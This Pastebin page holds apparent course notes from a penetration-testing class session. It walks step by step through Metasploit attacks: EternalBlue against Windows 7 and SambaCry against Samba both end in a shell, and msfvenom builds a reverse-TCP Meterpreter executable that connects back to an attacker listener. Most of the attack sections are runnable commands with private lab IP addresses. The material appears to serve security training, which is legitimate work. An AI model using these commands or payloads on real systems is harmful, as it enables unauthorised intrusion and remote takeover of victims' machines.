Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Grade 2 Session 8
- =================
- Console Based Exploitation 3
- Windows 7 --> Eternal Blue
- Samba Cry --> Eternal Red
- Application Based Exploitation
- Payload Based Exploitation
- Post Exploitation --> Local Privilidge Escalation
- GUI Based Exploitation --> Armitage
- Console Based Exploitation 3
- ----------------------------
- Eternal Blue --> NSA Exploit leaked by Shadow Brokers
- EternalBlue-Double Pulsar
- dll --> Dynamic Linked Library File
- Double Pulsar creates a malicious .dll file and eternal blue executes that malicious .dll file in the target system.
- Shadow Brokers ---> Fuzzbunch.py
- Empire --> MSF of NSA
- Metasploit Module
- Steps
- =====
- Open a terminal
- 1. #arp-scan --local
- Target IP Address --> 192.168.228.138
- 2. #nmap 192.168.228.138
- 3. #nmap -sS -sC -sV 192.168.228.138
- 4. #nmap 192.168.228.138 --script vuln
- CVE-2017-0143
- Open another terminal, start metasploit framework
- 5. #msfconsole
- 6. #search CVE-2017-0143
- 7. #use auxiliary/scanner/smb/smb_ms17_010
- 8. #options
- 9. #set rhosts 192.168.228.138
- 10. #options
- 11. #run
- Host is vulnerable to the exploit
- 12. #use exploit/windows/smb/ms17_010_eternalblue
- 13. #show options
- 14. #set rhost 192.168.228.138
- 15. #options
- 16. #exploit
- C:/Windows/System32> --> I got the access of the command prompt
- For Changing the payload
- set payload windows/meterpreter/reverse_tcp
- Samba Cry - Eternal Red
- =======================
- Is the vulnerability for Linux Based OS. SMBv2.
- NSA Exploit leaked by Shadow Brokers.
- Open a terminal
- 1. #arp-scan --local
- Target IP Address --> 192.168.228.151
- 2. #nmap 192.168.228.151
- 3. #nmap -sS -sC -sV 192.168.228.151
- 4. #nmap 192.168.228.151 --script vuln
- Open another terminal, start metasploit framework
- 5. #search is_known_pipename
- 6. #search cve-2017-7494
- exploit/linux/samba/is_known_pipename
- 7. #use exploit/linux/samba/is_known_pipename
- 8. #info
- 9. #options
- 10. #set rhost 192.168.228.151
- 11. #run
- Will Give me raw shell --> Bash Shell
- Application Based Exploitation
- ==============================
- Open the terminal, start with msfconsole
- 1. #msfconsole
- 2. #search payload/windows/meterpreter
- payload/windows/meterpreter/reverse_tcp --> use
- payload/windows/meterpreter_reverse_tcp
- payload/windows/meterpreter/reverse_http
- payload/windows/meterpreter_reverse_tcp
- Open Another Terminal, for creating a payload - stub
- 3. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.25 lport=8989 -f exe > /root/Desktop/prasheel.exe
- -p --> selecting the payload
- windows/meterpreter/reverse_tcp --> is the payload
- lhost --> attacker's IP Address
- lport --> Listening attacker's port
- -f --> file format
- exe --> executable file
- > --> destination of the output
- /root/Desktop/prasheel.exe --> is the output file
- Go back to the first terminal, exploit, set the listening server
- 4. #use exploit/multi/handler
- 5. #show options
- 6. #set payload windows/meterpreter/reverse_tcp
- 7. #show options
- 8. #set lport 8989
- 9. #set lhost 192.168.0.25
- 10. #exploit
- Armitage --> GUI Based Exploitation
- Graphical Version of Metasploit Framework
Add Comment
Please, Sign In to add comment